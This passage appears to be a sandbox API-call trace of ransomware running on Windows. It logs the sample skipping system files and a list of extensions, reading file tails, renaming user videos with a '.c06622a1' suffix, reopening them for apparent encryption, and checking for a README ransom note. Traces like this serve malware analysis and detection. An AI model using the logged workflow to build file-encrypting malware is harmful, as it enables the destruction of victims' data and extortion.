(_Str1="bootsect.bak", _Str2="ccRD.swf") returned -1 [0156.293] wcslen (_String="bootsect.bak") returned 0xc [0156.293] _wcsicmp (_Str1="desktop.ini", _Str2="ccRD.swf") returned 1 [0156.293] wcslen (_String="desktop.ini") returned 0xb [0156.293] _wcsicmp (_Str1="iconcache.db", _Str2="ccRD.swf") returned 6 [0156.293] wcslen (_String="iconcache.db") returned 0xc [0156.293] _wcsicmp (_Str1="ntldr", _Str2="ccRD.swf") returned 11 [0156.294] wcslen (_String="ntldr") returned 0x5 [0156.294] _wcsicmp (_Str1="ntuser.dat", _Str2="ccRD.swf") returned 11 [0156.294] wcslen (_String="ntuser.dat") returned 0xa [0156.294] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ccRD.swf") returned 11 [0156.294] wcslen (_String="ntuser.dat.log") returned 0xe [0156.294] _wcsicmp (_Str1="ntuser.ini", _Str2="ccRD.swf") returned 11 [0156.294] wcslen (_String="ntuser.ini") returned 0xa [0156.294] _wcsicmp (_Str1="thumbs.db", _Str2="ccRD.swf") returned 17 [0156.294] wcslen (_String="thumbs.db") returned 0x9 [0156.294] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0156.294] wcslen (_String="386") returned 0x3 [0156.294] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0156.294] wcslen (_String="adv") returned 0x3 [0156.294] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0156.294] wcslen (_String="ani") returned 0x3 [0156.294] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0156.294] wcslen (_String="bat") returned 0x3 [0156.294] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0156.294] wcslen (_String="bin") returned 0x3 [0156.294] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0156.294] wcslen (_String="cab") returned 0x3 [0156.294] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0156.294] wcslen (_String="cmd") returned 0x3 [0156.294] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0156.294] wcslen (_String="com") returned 0x3 [0156.294] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0156.294] wcslen (_String="cpl") returned 0x3 [0156.294] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0156.294] wcslen (_String="cur") returned 0x3 [0156.294] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0156.294] wcslen (_String="deskthemepack") returned 0xd [0156.294] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0156.294] wcslen (_String="diagcab") returned 0x7 [0156.294] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0156.294] wcslen (_String="diagcfg") returned 0x7 [0156.294] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0156.294] wcslen (_String="diagpkg") returned 0x7 [0156.294] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0156.295] wcslen (_String="dll") returned 0x3 [0156.295] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0156.295] wcslen (_String="drv") returned 0x3 [0156.295] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0156.295] wcslen (_String="exe") returned 0x3 [0156.295] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0156.295] wcslen (_String="hlp") returned 0x3 [0156.295] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0156.295] wcslen (_String="icl") returned 0x3 [0156.295] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0156.295] wcslen (_String="icns") returned 0x4 [0156.295] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0156.295] wcslen (_String="ico") returned 0x3 [0156.295] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0156.295] wcslen (_String="ics") returned 0x3 [0156.295] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0156.295] wcslen (_String="idx") returned 0x3 [0156.295] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0156.295] wcslen (_String="ldf") returned 0x3 [0156.295] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0156.295] wcslen (_String="lnk") returned 0x3 [0156.295] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0156.295] wcslen (_String="mod") returned 0x3 [0156.295] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0156.295] wcslen (_String="mpa") returned 0x3 [0156.295] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0156.295] wcslen (_String="msc") returned 0x3 [0156.295] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0156.295] wcslen (_String="msp") returned 0x3 [0156.295] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0156.295] wcslen (_String="msstyles") returned 0x8 [0156.295] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0156.295] wcslen (_String="msu") returned 0x3 [0156.295] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0156.295] wcslen (_String="nls") returned 0x3 [0156.295] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0156.295] wcslen (_String="nomedia") returned 0x7 [0156.296] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0156.296] wcslen (_String="ocx") returned 0x3 [0156.296] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0156.296] wcslen (_String="prf") returned 0x3 [0156.296] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0156.296] wcslen (_String="ps1") returned 0x3 [0156.296] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0156.296] wcslen (_String="rom") returned 0x3 [0156.296] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0156.296] wcslen (_String="rtp") returned 0x3 [0156.296] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0156.296] wcslen (_String="scr") returned 0x3 [0156.296] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0156.296] wcslen (_String="shs") returned 0x3 [0156.296] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0156.296] wcslen (_String="spl") returned 0x3 [0156.296] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0156.296] wcslen (_String="sys") returned 0x3 [0156.296] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0156.296] wcslen (_String="theme") returned 0x5 [0156.296] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0156.296] wcslen (_String="themepack") returned 0x9 [0156.296] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0156.296] wcslen (_String="wpx") returned 0x3 [0156.296] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0156.296] wcslen (_String="lock") returned 0x4 [0156.296] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0156.296] wcslen (_String="key") returned 0x3 [0156.296] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0156.296] wcslen (_String="hta") returned 0x3 [0156.296] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0156.296] wcslen (_String="msi") returned 0x3 [0156.296] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0156.296] wcslen (_String="pdb") returned 0x3 [0156.296] _wcsicmp (_Str1="sql", _Str2="swf") returned -6 [0156.296] wcslen (_String="sql") returned 0x3 [0156.297] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0156.297] wcslen (_String="sqlite") returned 0x6 [0156.297] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq")) returned 0x10 [0156.297] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0156.297] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" [0156.297] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ") returned 0x4d [0156.297] wcscpy (in: _Dest=0x4530144, _Source="ccRD.swf" | out: _Dest="ccRD.swf") returned="ccRD.swf" [0156.297] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\ccRD.swf", dwFileAttributes=0x80) returned 1 [0156.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\ccRD.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\ccrd.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x66c [0156.297] SetFilePointerEx (in: hFile=0x66c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.297] ReadFile (in: hFile=0x66c, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0156.298] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x7f3e9c3 [0156.298] RtlComputeCrc32 (PartialCrc=0xe9c3, Buffer=0x3fe674, Length=0x80) returned 0x8cceaa5a [0156.298] RtlComputeCrc32 (PartialCrc=0xaa5a, Buffer=0x3fe674, Length=0x80) returned 0xf1afe286 [0156.298] RtlComputeCrc32 (PartialCrc=0xe286, Buffer=0x3fe674, Length=0x80) returned 0xe978fc35 [0156.298] RtlComputeCrc32 (PartialCrc=0xfc35, Buffer=0x3fe674, Length=0x80) returned 0x79469439 [0156.298] CloseHandle (hObject=0x66c) returned 1 [0156.298] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0156.298] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\ccRD.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\ccRD.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\ccRD.swf" [0156.298] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\ccRD.swf") returned 0x56 [0156.298] wcscpy (in: _Dest=0x454015c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.298] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\ccRD.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\ccrd.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\ccRD.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\ccrd.swf.c06622a1"), dwFlags=0x8) returned 1 [0156.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\ccRD.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\ccrd.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x66c [0156.301] CreateIoCompletionPort (FileHandle=0x66c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.301] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0156.306] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x29ba4fdb [0156.306] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1649993d [0156.306] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x348d6ce2 [0156.306] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x54d328e4 [0156.306] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x24fa3892 [0156.306] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x27fb3d4f [0156.306] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5e0c9208 [0156.306] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4f9cdad3 [0156.309] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0x62eb3690 [0156.309] RtlComputeCrc32 (PartialCrc=0x3690, Buffer=0x41f0094, Length=0x80) returned 0x446fb76e [0156.309] RtlComputeCrc32 (PartialCrc=0xb76e, Buffer=0x41f0094, Length=0x80) returned 0x5608477c [0156.309] RtlComputeCrc32 (PartialCrc=0x477c, Buffer=0x41f0094, Length=0x80) returned 0xdc0451a5 [0156.309] RtlComputeCrc32 (PartialCrc=0x51a5, Buffer=0x41f0094, Length=0x80) returned 0xfff880a5 [0156.309] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0156.309] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0156.309] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0156.309] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cf41a60, ftCreationTime.dwHighDateTime=0x1d5de2c, ftLastAccessTime.dwLowDateTime=0x9b3480a0, ftLastAccessTime.dwHighDateTime=0x1d5e05c, ftLastWriteTime.dwLowDateTime=0x9b3480a0, ftLastWriteTime.dwHighDateTime=0x1d5e05c, nFileSizeHigh=0x0, nFileSizeLow=0x14211, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ny4IBsN6sDAZ.mp4", cAlternateFileName="NY4IBS~1.MP4")) returned 1 [0156.309] _wcsicmp (_Str1="Ny4IBsN6sDAZ.mp4", _Str2="README.c06622a1.TXT") returned -4 [0156.309] wcsstr (_Str="Ny4IBsN6sDAZ.mp4", _SubStr="README") returned 0x0 [0156.309] _wcsicmp (_Str1="autorun.inf", _Str2="Ny4IBsN6sDAZ.mp4") returned -13 [0156.309] wcslen (_String="autorun.inf") returned 0xb [0156.309] _wcsicmp (_Str1="boot.ini", _Str2="Ny4IBsN6sDAZ.mp4") returned -12 [0156.310] wcslen (_String="boot.ini") returned 0x8 [0156.310] _wcsicmp (_Str1="bootfont.bin", _Str2="Ny4IBsN6sDAZ.mp4") returned -12 [0156.310] wcslen (_String="bootfont.bin") returned 0xc [0156.310] _wcsicmp (_Str1="bootsect.bak", _Str2="Ny4IBsN6sDAZ.mp4") returned -12 [0156.310] wcslen (_String="bootsect.bak") returned 0xc [0156.310] _wcsicmp (_Str1="desktop.ini", _Str2="Ny4IBsN6sDAZ.mp4") returned -10 [0156.310] wcslen (_String="desktop.ini") returned 0xb [0156.310] _wcsicmp (_Str1="iconcache.db", _Str2="Ny4IBsN6sDAZ.mp4") returned -5 [0156.310] wcslen (_String="iconcache.db") returned 0xc [0156.310] _wcsicmp (_Str1="ntldr", _Str2="Ny4IBsN6sDAZ.mp4") returned -5 [0156.310] wcslen (_String="ntldr") returned 0x5 [0156.310] _wcsicmp (_Str1="ntuser.dat", _Str2="Ny4IBsN6sDAZ.mp4") returned -5 [0156.310] wcslen (_String="ntuser.dat") returned 0xa [0156.310] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Ny4IBsN6sDAZ.mp4") returned -5 [0156.310] wcslen (_String="ntuser.dat.log") returned 0xe [0156.310] _wcsicmp (_Str1="ntuser.ini", _Str2="Ny4IBsN6sDAZ.mp4") returned -5 [0156.310] wcslen (_String="ntuser.ini") returned 0xa [0156.310] _wcsicmp (_Str1="thumbs.db", _Str2="Ny4IBsN6sDAZ.mp4") returned 6 [0156.310] wcslen (_String="thumbs.db") returned 0x9 [0156.310] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0156.310] wcslen (_String="386") returned 0x3 [0156.310] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0156.310] wcslen (_String="adv") returned 0x3 [0156.310] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0156.310] wcslen (_String="ani") returned 0x3 [0156.310] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0156.310] wcslen (_String="bat") returned 0x3 [0156.310] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0156.310] wcslen (_String="bin") returned 0x3 [0156.310] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0156.310] wcslen (_String="cab") returned 0x3 [0156.310] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0156.310] wcslen (_String="cmd") returned 0x3 [0156.310] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0156.310] wcslen (_String="com") returned 0x3 [0156.310] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0156.310] wcslen (_String="cpl") returned 0x3 [0156.311] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0156.311] wcslen (_String="cur") returned 0x3 [0156.311] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0156.311] wcslen (_String="deskthemepack") returned 0xd [0156.311] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0156.311] wcslen (_String="diagcab") returned 0x7 [0156.311] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0156.311] wcslen (_String="diagcfg") returned 0x7 [0156.311] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0156.311] wcslen (_String="diagpkg") returned 0x7 [0156.311] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0156.311] wcslen (_String="dll") returned 0x3 [0156.311] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0156.311] wcslen (_String="drv") returned 0x3 [0156.311] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0156.311] wcslen (_String="exe") returned 0x3 [0156.311] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0156.311] wcslen (_String="hlp") returned 0x3 [0156.311] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0156.311] wcslen (_String="icl") returned 0x3 [0156.311] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0156.311] wcslen (_String="icns") returned 0x4 [0156.311] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0156.311] wcslen (_String="ico") returned 0x3 [0156.311] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0156.311] wcslen (_String="ics") returned 0x3 [0156.311] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0156.311] wcslen (_String="idx") returned 0x3 [0156.311] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0156.311] wcslen (_String="ldf") returned 0x3 [0156.312] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0156.312] wcslen (_String="lnk") returned 0x3 [0156.312] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0156.312] wcslen (_String="mod") returned 0x3 [0156.312] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0156.312] wcslen (_String="mpa") returned 0x3 [0156.312] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0156.312] wcslen (_String="msc") returned 0x3 [0156.312] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0156.312] wcslen (_String="msp") returned 0x3 [0156.312] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0156.312] wcslen (_String="msstyles") returned 0x8 [0156.312] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0156.312] wcslen (_String="msu") returned 0x3 [0156.312] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0156.312] wcslen (_String="nls") returned 0x3 [0156.312] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0156.312] wcslen (_String="nomedia") returned 0x7 [0156.312] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0156.312] wcslen (_String="ocx") returned 0x3 [0156.312] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0156.312] wcslen (_String="prf") returned 0x3 [0156.312] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0156.312] wcslen (_String="ps1") returned 0x3 [0156.312] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0156.312] wcslen (_String="rom") returned 0x3 [0156.312] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0156.312] wcslen (_String="rtp") returned 0x3 [0156.312] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0156.312] wcslen (_String="scr") returned 0x3 [0156.312] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0156.312] wcslen (_String="shs") returned 0x3 [0156.312] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0156.312] wcslen (_String="spl") returned 0x3 [0156.312] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0156.312] wcslen (_String="sys") returned 0x3 [0156.312] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0156.312] wcslen (_String="theme") returned 0x5 [0156.313] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0156.313] wcslen (_String="themepack") returned 0x9 [0156.313] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0156.313] wcslen (_String="wpx") returned 0x3 [0156.313] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0156.313] wcslen (_String="lock") returned 0x4 [0156.313] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0156.313] wcslen (_String="key") returned 0x3 [0156.313] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0156.313] wcslen (_String="hta") returned 0x3 [0156.313] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0156.313] wcslen (_String="msi") returned 0x3 [0156.313] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0156.313] wcslen (_String="pdb") returned 0x3 [0156.313] _wcsicmp (_Str1="sql", _Str2="mp4") returned 6 [0156.313] wcslen (_String="sql") returned 0x3 [0156.313] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0156.313] wcslen (_String="sqlite") returned 0x6 [0156.313] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq")) returned 0x10 [0156.313] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0156.313] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ" [0156.313] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ") returned 0x4d [0156.313] wcscpy (in: _Dest=0x4530144, _Source="Ny4IBsN6sDAZ.mp4" | out: _Dest="Ny4IBsN6sDAZ.mp4") returned="Ny4IBsN6sDAZ.mp4" [0156.313] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Ny4IBsN6sDAZ.mp4", dwFileAttributes=0x80) returned 1 [0156.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Ny4IBsN6sDAZ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\ny4ibsn6sdaz.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0156.314] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.314] ReadFile (in: hFile=0x368, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0156.315] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xd3c940c0 [0156.315] RtlComputeCrc32 (PartialCrc=0x40c0, Buffer=0x3fe674, Length=0x80) returned 0x3e8e51c2 [0156.315] RtlComputeCrc32 (PartialCrc=0x51c2, Buffer=0x3fe674, Length=0x80) returned 0x284d891 [0156.315] RtlComputeCrc32 (PartialCrc=0xd891, Buffer=0x3fe674, Length=0x80) returned 0x62db69b2 [0156.315] RtlComputeCrc32 (PartialCrc=0x69b2, Buffer=0x3fe674, Length=0x80) returned 0x35ef0f37 [0156.315] CloseHandle (hObject=0x368) returned 1 [0156.315] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0156.315] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Ny4IBsN6sDAZ.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Ny4IBsN6sDAZ.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Ny4IBsN6sDAZ.mp4" [0156.315] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Ny4IBsN6sDAZ.mp4") returned 0x5e [0156.315] wcscpy (in: _Dest=0x454016c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.315] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Ny4IBsN6sDAZ.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\ny4ibsn6sdaz.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Ny4IBsN6sDAZ.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\ny4ibsn6sdaz.mp4.c06622a1"), dwFlags=0x8) returned 1 [0156.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4710A08 09t9o0aXhpe\\iOgAhCv1rp-V82bQ\\Ny4IBsN6sDAZ.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4710a08 09t9o0axhpe\\iogahcv1rp-v82bq\\ny4ibsn6sdaz.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 